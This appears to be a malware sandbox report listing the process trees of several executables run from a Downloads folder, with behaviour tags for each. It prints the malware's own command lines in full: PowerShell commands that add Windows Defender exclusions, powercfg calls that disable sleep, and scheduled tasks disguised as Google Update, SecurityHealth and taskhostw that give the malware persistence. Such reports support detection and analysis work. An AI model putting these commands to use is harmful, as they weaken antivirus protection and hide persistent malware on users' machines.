        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5684 /prefetch:14
        PID: 5860
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5416,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=212 /prefetch:14
        PID: 1476
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5740 /prefetch:14
        PID: 5760
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4296,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 4224
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4316,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4332 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 4108
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5708 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 1516
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5476,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4328 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 1148
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5148 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 5400
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4400,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4304 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 5504
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4332,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5148 /prefetch:14
        - Subvert Trust Controls: Mark-of-the-Web Bypass
        - NTFS ADS
        PID: 5336
    [3] C:\Users\Admin\Downloads\testo.exe
        cmdline: "C:\Users\Admin\Downloads\testo.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        PID: 2180
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4376,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5596 /prefetch:10
        PID: 4292
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4488,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6248 /prefetch:14
        PID: 5512
  [2] C:\Users\Admin\Downloads\new.exe
      cmdline: "C:\Users\Admin\Downloads\new.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID: 6140
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 1744
  [2] C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID: 4604
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
        - Power Settings
        PID: 3036
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
        - Power Settings
        PID: 1108
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
        - Power Settings
        PID: 572
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
        - Power Settings
        PID: 3988
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lkvsnqv#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 4724
  [2] C:\Windows\System32\schtasks.exe
      cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
      PID: 1244
  [2] C:\Users\Admin\Downloads\testo.exe
      cmdline: "C:\Users\Admin\Downloads\testo.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID: 700
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID: 1444
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 796
  [2] C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID: 460
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
        - Power Settings
        PID: 2208
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
        - Power Settings
        PID: 2272
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
        - Power Settings
        PID: 2840
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
        - Power Settings
        PID: 4928
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 5140
  [2] C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID: 4648
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
        - Power Settings
        PID: 4036
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
        - Power Settings
        PID: 4564
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
        - Power Settings
        PID: 788
    [3] C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
        - Power Settings
        PID: 3640
  [2] C:\Windows\System32\schtasks.exe
      cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
      PID: 1932
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lkvsnqv#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID: 980
  [2] C:\Users\Admin\Downloads\Winrar.exe
      cmdline: "C:\Users\Admin\Downloads\Winrar.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      PID: 2148
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Winrar" /tr '"C:\Users\Admin\AppData\Local\Temp\Winrar.exe"' & exit
        - System Location Discovery: System Language Discovery
        PID: 2012
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Winrar" /tr '"C:\Users\Admin\AppData\Local\Temp\Winrar.exe"'
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
          PID: 1324
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC2FD.tmp.bat""
        - System Location Discovery: System Language Discovery
        PID: 2764
      [4] C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout 3
          - System Location Discovery: System Language Discovery
          - Delays execution with timeout.exe
          PID: 4636
      [4] C:\Users\Admin\AppData\Local\Temp\Winrar.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\Winrar.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
          PID: 2080
  [2] C:\Windows\System32\conhost.exe
      cmdline: C:\Windows\System32\conhost.exe
      PID: 5312
  [2] C:\Windows\explorer.exe
      cmdline: C:\Windows\explorer.exe
      - Suspicious behavior: EnumeratesProcesses
      PID: 5316
  [2] C:\Users\Admin\Downloads\Update.exe
      cmdline: "C:\Users\Admin\Downloads\Update.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
      PID: 5496
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Update.exe'
        - Command and Scripting Interpreter: PowerShell
        PID: 4576
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
        - Command and Scripting Interpreter: PowerShell
        PID: 6000
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\taskhostw.exe'
        - Command and Scripting Interpreter: PowerShell
        PID: 2192
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
        - Command and Scripting Interpreter: PowerShell
        PID: 5300
    [3] C:\Windows\System32\schtasks.exe
        cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskhostw" /tr "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        - Scheduled Task/Job: Scheduled Task
        PID: 3508
  [2] C:\Users\Admin\Downloads\SecurityHealth.exe
      cmdline: "C:\Users\Admin\Downloads\SecurityHealth.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - NTFS ADS
      PID: 5336
    [3] C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        PID: 4828
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmdline: "schtasks.exe" /Create /TN "SecurityHealth" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDEE2.tmp" /F
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
          PID: 3828
        [5] C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID: 1380
  [2] C:\Users\Admin\Downloads\Fresh.exe
      cmdline: "C:\Users\Admin\Downloads\Fresh.exe"
      - Executes dropped EXE
      PID: 5616
    [3] C:\Users\Admin\AppData\Local\Temp\4y3ovtul.fs3.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\4y3ovtul.fs3.exe"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        PID: 2340
    [3] C:\Windows\SYSTEM32\SCHTASKS.exe
        cmdline: "SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST
        - Scheduled Task/Job: Scheduled Task
        PID: 5124
    [3] C:\Windows\SYSTEM32\SCHTASKS.exe
        cmdline: "SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST
        - Scheduled Task/Job: Scheduled Task
        PID: 5608
      [4] C:\Windows\System32\Conhost.exe
          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID: 5704
C:\Users\Admin\Downloads\Best.exe"C:\Users\Admin\Downloads\Best.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:5936
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4624
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3836
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:2500 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2500 -s 2324⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5724
-
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:5024 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5024 -s 2364⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2320
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjxszzlc#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:5940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3660
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5692
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3324
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:376
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:5632
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:2084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjxszzlc#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5460
    C:\Windows\System32\Conhost.exe
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:5792 (depth 3)
  C:\Windows\System32\conhost.exe
    command line: C:\Windows\System32\conhost.exe
    PID:4344 (depth 2)
  C:\Windows\explorer.exe
    command line: C:\Windows\explorer.exe
    PID:4508 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:5412 (depth 2)
  C:\Windows\System32\cmd.exe
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    PID:1028 (depth 2)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      PID:2592 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      PID:5712 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-ac 0
      - Power Settings
      PID:6096 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID:5016 (depth 3)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:4380 (depth 2)
  C:\Windows\System32\schtasks.exe
    command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    PID:5592 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:2404 (depth 2)
  C:\Windows\System32\cmd.exe
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    PID:1212 (depth 2)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      PID:2440 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      PID:1664 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-ac 0
      - Power Settings
      PID:4456 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID:952 (depth 3)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:2836 (depth 2)
  C:\Windows\System32\conhost.exe
    command line: C:\Windows\System32\conhost.exe
    PID:4052 (depth 2)
  C:\Users\Admin\Downloads\Fresh.exe
    command line: "C:\Users\Admin\Downloads\Fresh.exe"
    PID:4636 (depth 2)
    C:\Users\Admin\AppData\Local\Temp\bezte5mm.czc.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\bezte5mm.czc.exe"
      PID:6044 (depth 3)
    C:\Windows\SYSTEM32\SCHTASKS.exe
      command line: "SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST
      - Scheduled Task/Job: Scheduled Task
      PID:4388 (depth 3)
    C:\Windows\SYSTEM32\SCHTASKS.exe
      command line: "SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST
      - Scheduled Task/Job: Scheduled Task
      PID:4500 (depth 3)
  C:\Users\Admin\Downloads\SecurityHealth.exe
    command line: "C:\Users\Admin\Downloads\SecurityHealth.exe"
    PID:4380 (depth 2)
    C:\Windows\SysWOW64\schtasks.exe
      command line: "schtasks.exe" /Create /TN "SecurityHealth" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB731.tmp" /F
      - Scheduled Task/Job: Scheduled Task
      PID:4284 (depth 3)
  C:\Windows\explorer.exe
    command line: C:\Windows\explorer.exe
    PID:1488 (depth 2)
  C:\Users\Admin\Downloads\Update.exe
    command line: "C:\Users\Admin\Downloads\Update.exe"
    PID:5484 (depth 2)
  C:\Users\Admin\Downloads\Winrar.exe
    command line: "C:\Users\Admin\Downloads\Winrar.exe"
    PID:4820 (depth 2)
  C:\Users\Admin\Downloads\testo.exe
    command line: "C:\Users\Admin\Downloads\testo.exe"
    PID:2148 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
